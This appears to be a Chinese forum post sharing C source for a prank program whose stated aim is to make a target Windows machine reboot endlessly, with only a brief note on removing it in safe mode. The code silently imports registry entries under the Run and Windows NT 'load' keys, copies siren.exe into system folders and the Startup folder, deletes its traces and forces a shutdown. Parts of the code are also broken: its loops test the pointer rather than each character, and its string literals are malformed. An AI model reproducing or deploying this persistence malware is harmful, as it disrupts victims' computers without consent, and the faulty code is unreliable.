目的:使得目标机器不断的重新启动!
解决的办法:在安全模式下,删掉相关的注册表文件和程序,就行了!至于路径和程序的名字,在源代码里有!
声明:如果你不熟悉注册表的话,还是不要轻易运行!
代码如下:
#include<stdio.h>
#include<stdlib.h>
int function(char * p1 , char * p2 , char * p3 , char * p4)
{
int i ;
FILE * fp ;
if ( (fp = fopen(p4 , "w")) == NULL){
printf ("文件不能打开!") ;
return 0 ;
}
for (i=0; p1 != '\0'; i++)
fputc (p1 , fp) ;
fputc (' ' , fp) ;
fputc (' ' , fp) ;
for (i=0; p2 != '\0'; i++)
fputc (p2 , fp) ;
fputc (' ' , fp) ;
for (i=0; p3 != '\0'; i++)
fputc (p3 , fp) ;
fputc ('\n' , fp) ;
fputc ('\n' , fp) ;
fclose (fp) ;
return 0 ;
}
int main ( void )
{
int i ;
char rigi1[] = "Windows Registry Editor Version 5.00" ;
char rigi2[] = "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]" ;
char rigi3[] = ""siren.exe"="C:\\windows\\siren.exe"" ;
function(rigi1 , rigi2 , rigi3 , "Ping.reg") ;
char rjgi1[] = "Windows Registry Editor Version 5.00" ;
char rjgi2[] = "[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]" ;
char rjgi3[] = ""load"="C:\\windows\\system32\\siren.exe"" ;
function(rjgi1 , rjgi2 , rjgi3 , "netstart.reg") ;
system("regedit /s Ping.reg") ;
system("regedit /s netstart.reg") ;
system("copy Ping.reg C:\windows\Ping.reg") ;
system("copy netstart.reg C:\windows\system32\netstart.reg") ;
system("del Ping.reg") ;
system("del netstart.reg") ;
system("copy siren.exe C:\windows\siren.exe") ;
system("copy siren.exe C:\windows\system32\siren.exe") ;
system("copy siren.exe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\siren.exe") ;
printf ("要学习,不要老是耍游戏,去自习了哈!");
system("shutdown") ;
return 0 ;
}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
